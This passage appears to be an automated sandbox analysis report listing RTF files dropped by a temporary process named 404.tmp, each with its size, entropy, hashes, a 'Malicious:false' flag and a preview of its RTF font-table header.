                                                                                                                                                                                                                                                          Entropy (8bit):5.090193363439038
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8SX8t+yiBkyKWm+yqBjLW5qoFxbyl2Zweq4zX:s8cf4zX
                                                                                                                                                                                                                                                          MD5:2519F9520A2AB950F74212172A0BEB94
                                                                                                                                                                                                                                                          SHA1:BA0E1A1C41C867840AE63A677B053DA1118F886B
                                                                                                                                                                                                                                                          SHA-256:E1A9AD7ADB8F8E6969D8F8522118371971B6FE01CD6248819CEBEDBF2EAE9CB6
                                                                                                                                                                                                                                                          SHA-512:AA64B50E2570FFC247DB4D7D182F56A3C0010247AAC51D030AB554DA1A1B4D465CCEA6C50389610864E4B89E4381F575672D0A53018CE18483FAD26B021C1ECE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43600
                                                                                                                                                                                                                                                          Entropy (8bit):5.089965856777119
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8SX8tS1BOd5rXmgamSN4UIRop4RiHAhzIaq4z4:s8cWRK4z4
                                                                                                                                                                                                                                                          MD5:A79752006AFB6D9A39FC512475ED8493
                                                                                                                                                                                                                                                          SHA1:41B4CD12ACE830E94F30119B35317B7C3C49DAEA
                                                                                                                                                                                                                                                          SHA-256:F0DEFD01327E90A5DCB72C78B1A1D0A875D39E43AC8CD1D2BB0E63B25465BADF
                                                                                                                                                                                                                                                          SHA-512:003CEED560F76521D0457BE2CCD3E438E7100765A6ECA110AE9EE47B43FA807DB389F1B1E1C3D001FC170B38E211E46A4D280799BEE93DA79237B9BD9B34F812
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):34167
                                                                                                                                                                                                                                                          Entropy (8bit):5.060082647909622
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:p4ew9g0BnPz+p/zWFU48XTKjH2njzr8x3e9kl6YpXNEnysJQezqCdPcedBKfieoE:p4e548XTKT2njX8x3UW7U7vhezZ/6A9P
                                                                                                                                                                                                                                                          MD5:67CFAF3E0373E3678B93AFE97714C9CC
                                                                                                                                                                                                                                                          SHA1:67D9665DEC3734F04E4FE7F893FE12CF008769FD
                                                                                                                                                                                                                                                          SHA-256:E47932F8DAD868BDFA11A27D4E6B6F5520D99C33FB574BB74D1FA4ED37DE33DB
                                                                                                                                                                                                                                                          SHA-512:651811F016A6081D2913336BA4E1B7562DC3A65F7727005B25BC5F0B86C7AF97098C5AEC40FD42CEE43433B4F0036C64479A12C47D5A0A32ED42B656DE6ECDD2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):79588
                                                                                                                                                                                                                                                          Entropy (8bit):4.979859328003009
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:p4eOev/+zl3C79k8thfqXMwANr1DZoLLXI1nHT2njX8x3Gj5g5V5V5h5G5P5N59h:p4+w60IA99
                                                                                                                                                                                                                                                          MD5:BFC11879D9DE972A3AE377B204D09593
                                                                                                                                                                                                                                                          SHA1:7B79C412A2AE5D21CCA333CC2F96B70DD7E1C3DE
                                                                                                                                                                                                                                                          SHA-256:DA65EA1EAC2D7DFC5F8EA31CF07A34ECD9054B5BBE31AA7651DAB81518E67324
                                                                                                                                                                                                                                                          SHA-512:81F878B172CC528E2ACE51BE1DE4D27B248EE8B2E5FB3C7A0B5D6A51CC5A4024B7255975F8A98F85E7BC79C16F059DC1958CDC0DDFC07CF9DA1B0926B21D0A49
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40943
                                                                                                                                                                                                                                                          Entropy (8bit):5.062621250408577
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:pqeS48Um0GhbtabQhOsWx/LCrLXI1n8T2njX8x3Ftt4MfRMIq818Z/6A9i:pqKH+qIA9i
                                                                                                                                                                                                                                                          MD5:E2D6C3DBD79C905DABE49F310F9A134E
                                                                                                                                                                                                                                                          SHA1:072CB75BBAD6904B39757E423EEDA0F3CA9FA8D7
                                                                                                                                                                                                                                                          SHA-256:0A9C5D645D90A6D3CA88495DE5D0410CE8456C6AF5C0D56E4F225B81CECC0069
                                                                                                                                                                                                                                                          SHA-512:EEC29BB5020AE654E7A0DB369722B1AD8286D97288C40E009B26AD20A2A9CD661B5AE9CCFFF7629B378EFC98AFA505F933F36C2AF0A49E7C7FD35D3925B0BF42
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52084
                                                                                                                                                                                                                                                          Entropy (8bit):5.088144154341775
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ssSn8tDcYXyC+R+8tDcpzyA/mwMWGwI+X0IjuqhR2X4PUPgb5o69HPriWEudPiaR:sswX64zI
                                                                                                                                                                                                                                                          MD5:23F3B31CDFBD1A8A1695D3D7E4EF9B36
                                                                                                                                                                                                                                                          SHA1:A1B344F97F06F83DD818A51338B965793167F826
                                                                                                                                                                                                                                                          SHA-256:6774CCE8D38C1CE308190456560DDDC892BB4845220D08622C7D89BA79A148CB
                                                                                                                                                                                                                                                          SHA-512:145B093694165C40D4B951A2193BC573E57538D0EC6252A1C659B5258ACC327573803C31BC184196B5C0AEF372157878FFF76E7250BB2B4211BCA04A0488B3C8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52487
                                                                                                                                                                                                                                                          Entropy (8bit):5.092431049148049
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/LF89zHebIrUQBkyKWm+2Ck4O6CFURooIniy+JcOerjj1oMUliJ/KK0KhKuiFq:ssZmQUw4zQ
                                                                                                                                                                                                                                                          MD5:CBF3434F05AFD39EAF4FF2766C533BCD
                                                                                                                                                                                                                                                          SHA1:A339CCBDD47201D50598801A53E979B0C0A52607
                                                                                                                                                                                                                                                          SHA-256:0F58E6C26916B5B1E7A9E1130C8EC22A08A2500972446EC232901013C7645A1B
                                                                                                                                                                                                                                                          SHA-512:2EB64B6B8625BF64341EAD806EBE07E3BCD954DEC97D50BD68E6990062C1EBAA7553EA2834D04291B4E103F28296BB1F4F5CA6182E143F07752AD375DC8C80DF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53088
                                                                                                                                                                                                                                                          Entropy (8bit):5.091636989377984
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/Ly89zHebIrXWeKyggjmvOnaCwL9W1bd5JIyyFXMjjv0dp+ILGmx5BfQNCrli8:ssm1Gg4zO
                                                                                                                                                                                                                                                          MD5:505DFAF995C4EA7441C48E99C6400772
                                                                                                                                                                                                                                                          SHA1:26C112D3664663D7B9618D11D9BF7C893DAD3A1A
                                                                                                                                                                                                                                                          SHA-256:6D87327F851810F5CC1844EC1A39ACC0390EFB02284094EC53AF1CD4CE8CA3B2
                                                                                                                                                                                                                                                          SHA-512:2F190B4882D740DB06E90532905A6A0EEBC73AC06D581FE993254C0E23A46E7DAAD5F63D0FF643F258D5603B6E866D8AC2447F336F109116777AB49FD824D356
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):56628
                                                                                                                                                                                                                                                          Entropy (8bit):5.001958639036602
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:pqFk5evUwdvjLJzrrrMOcPI0QhhiLVptabQhOsWxkMvxGx5QZ+GjaorHye0HmuwB:pqnVUne8GjaUECaIA9o
                                                                                                                                                                                                                                                          MD5:BA9CD5C6FBC3F41BA7B21B842B211D29
                                                                                                                                                                                                                                                          SHA1:337DF42901DA8E9855D59333E4357BB3CF9953E2
                                                                                                                                                                                                                                                          SHA-256:CD14DD162DFBA323EB79D496DB0E9D053B9D21A8AB7E300232074458A91F62E4
                                                                                                                                                                                                                                                          SHA-512:D6A9DC42E548806E469BA0B15C40E886BE92EBBE247116FEE9E15EA83D6B3A8B19C42DF639405DBCB70B3E6859E243406CA24BBAEEAA57E95CCE26128D04ECD7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):34167
                                                                                                                                                                                                                                                          Entropy (8bit):5.060082647909622
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:p4ew9g0BnPz+p/zWFU48XTKjH2njzr8x3e9kl6YpXNEnysJQezqCdPcedBKfieoE:p4e548XTKT2njX8x3UW7U7vhezZ/6A9P
                                                                                                                                                                                                                                                          MD5:67CFAF3E0373E3678B93AFE97714C9CC
                                                                                                                                                                                                                                                          SHA1:67D9665DEC3734F04E4FE7F893FE12CF008769FD
                                                                                                                                                                                                                                                          SHA-256:E47932F8DAD868BDFA11A27D4E6B6F5520D99C33FB574BB74D1FA4ED37DE33DB
                                                                                                                                                                                                                                                          SHA-512:651811F016A6081D2913336BA4E1B7562DC3A65F7727005B25BC5F0B86C7AF97098C5AEC40FD42CEE43433B4F0036C64479A12C47D5A0A32ED42B656DE6ECDD2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54763
                                                                                                                                                                                                                                                          Entropy (8bit):5.086159865228289
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/LF89zHebIrIQBkyKWm+2Ck4O6CFURooIniyl+n6S8aG+8Iu/wj5XvSTp5kiWz:ssZVpy4zU
                                                                                                                                                                                                                                                          MD5:FE0FD5197CD49B1818CD102069665E64
                                                                                                                                                                                                                                                          SHA1:313F0DF1F4B687043DAED9B1BB783BA36F8F1BC4
                                                                                                                                                                                                                                                          SHA-256:787E3B3DBC3E1DE91DD2C786085ED70616AF51B843C56B88541B40601390E055
                                                                                                                                                                                                                                                          SHA-512:B24055EE351C5973DF4C42D678A59F84EE4F7447AEDA49581413E97CBA59C0DF1F2E5712BC31C2F94FA399214208BBB9F1C6AE3EA6BB439728D1C5C5D156F96F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):79588
                                                                                                                                                                                                                                                          Entropy (8bit):4.979859328003009
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:p4eOev/+zl3C79k8thfqXMwANr1DZoLLXI1nHT2njX8x3Gj5g5V5V5h5G5P5N59h:p4+w60IA99
                                                                                                                                                                                                                                                          MD5:BFC11879D9DE972A3AE377B204D09593
                                                                                                                                                                                                                                                          SHA1:7B79C412A2AE5D21CCA333CC2F96B70DD7E1C3DE
                                                                                                                                                                                                                                                          SHA-256:DA65EA1EAC2D7DFC5F8EA31CF07A34ECD9054B5BBE31AA7651DAB81518E67324
                                                                                                                                                                                                                                                          SHA-512:81F878B172CC528E2ACE51BE1DE4D27B248EE8B2E5FB3C7A0B5D6A51CC5A4024B7255975F8A98F85E7BC79C16F059DC1958CDC0DDFC07CF9DA1B0926B21D0A49
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):67825
                                                                                                                                                                                                                                                          Entropy (8bit):4.9803843553687
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:pqeP2iXwdvjLJzrrrMOcPI0QhhiLVptabQhOsWxkMvxGx5QZTTHPmpncTUAF7s8a:pqL5UneNTHP3TIA9i
                                                                                                                                                                                                                                                          MD5:C84BB8D1E95FF5ED4B74B8F938B7C26F
